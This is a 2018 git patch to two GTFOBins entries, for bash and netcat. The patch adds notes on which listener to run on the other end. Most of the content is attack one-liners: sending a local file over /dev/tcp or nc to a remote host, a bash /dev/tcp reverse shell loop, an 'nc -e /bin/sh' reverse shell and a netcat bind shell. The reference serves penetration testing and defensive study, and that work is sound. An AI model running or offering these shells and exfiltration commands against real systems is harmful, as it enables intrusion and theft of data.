From fad84256244dae4f6749beb38143be081a9c5759 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Tue, 22 May 2018 18:51:52 +0100 Subject: [PATCH] Add nc and bash other end commands --- _gtfobins/bash.md | 13 +++++++------ _gtfobins/nc.md | 15 +++++++++------ 2 files changed, 16 insertions(+), 12 deletions(-) diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index 9504070..9b25cbb 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -7,13 +7,13 @@ functions: suid-enabled: - code: ./bash -p upload: - - description: Send local file in the body of an HTTP POST request. + - description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file from the other end. code: | RHOST=10.0.0.1 RPORT=8000 LFILE=file_to_send echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT - - description: Send local file using a TCP connection. + - description: Send local file using a TCP connection. Run `nc -l -p 8000 > "where_to_save"` to collect the file on the other end. code: | RHOST=10.0.0.1 RPORT=8000 @@ -26,15 +26,16 @@ functions: RPORT=8000 LFILE=file_to_get (echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE - - description: Fetch remote file using a TCP connection. + - description: Fetch remote file using a TCP connection. Run `nc -l -p 8000 < "file_to_send"` to send the file from the other end. code: |- RHOST=10.0.0.1 RPORT=8000 LFILE=file_to_get - bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE + cat < /dev/tcp/$RHOST/$RPORT > $LFILE reverse-shell: - - code: | - RHOST=127.0.0.1 + - description: Run `nc -l -p 8000` to receive the shell on the other end. + code: | + RHOST=10.0.0.1 RPORT=8000 exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done --- diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index e427a9e..59e2264 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -1,25 +1,28 @@ --- functions: upload: - - description: Serve a file on a TCP port. + - description: | + Send a file to a TCP port. Run `nc -l -p 8000 > "where_to_save"` to collect the file on the other end. code: | RHOST=10.0.0.1 RPORT=8000 LFILE=file_to_send nc $RHOST $RPORT < "$LFILE" download: - - description: Fetch remote file from a remote TCP port. + - description: Fetch remote file from a remote TCP port. Run `nc 10.0.0.2 8000 < "file_to_send"` to send the file from the other end. code: |- LPORT=8000 - LFILE=file_to_get + LFILE=where_to_save nc -l -p $LPORT > "$LFILE" reverse-shell: - - code: | + - description: Run `nc -l -p 8000` to receive the shell on the other end. + code: | RHOST=10.0.0.1 RPORT=8000 nc -e /bin/sh $RHOST $RPORT bind-shell: - - code: | + - description: Run `nc 10.0.0.2 8000` to connect to the shell on the other end. + code: | LPORT=8000 - nc -lp $LPORT -e /bin/sh + nc -l -p $LPORT -e /bin/sh ---